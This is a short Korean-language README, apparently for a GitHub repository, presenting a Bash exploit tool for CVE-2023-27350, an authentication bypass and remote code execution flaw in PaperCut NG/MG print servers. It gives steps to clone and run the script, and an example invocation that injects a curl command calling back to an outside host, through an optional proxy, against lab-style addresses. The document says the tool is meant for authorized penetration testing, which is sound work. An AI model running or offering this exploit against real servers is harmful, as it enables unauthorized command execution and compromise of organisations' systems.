
PaperCut NG/MG 인증 우회 및 원격 코드 실행(RCE) 익스플로잇 도구. PaperCut 익스플로잇 체인의 독립형 Bash 구현으로, 선택적 프록시 지원, 자동 세션 승격 및 인쇄 스크립팅 엔진을 통한 동적 명령 주입을 제공합니다. 보안 감사 및 승인된 침투 테스트를 위해 설계되었습니다.

CVE-2023-27350을 위한 간편한 Bash 익스플로잇입니다. 이 스크립트는 PaperCut 프린터 스크립팅 엔진을 통한 인증 우회, 환경 준비 및 명령어 주입을 자동화합니다.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : 대상 URL (예: http://10.129.x.x:9191)-c : 실행할 명령어 (따옴표로 묶음)-x : (선택 사항) 프록시 URL (예: http://10.129.x.x:3128)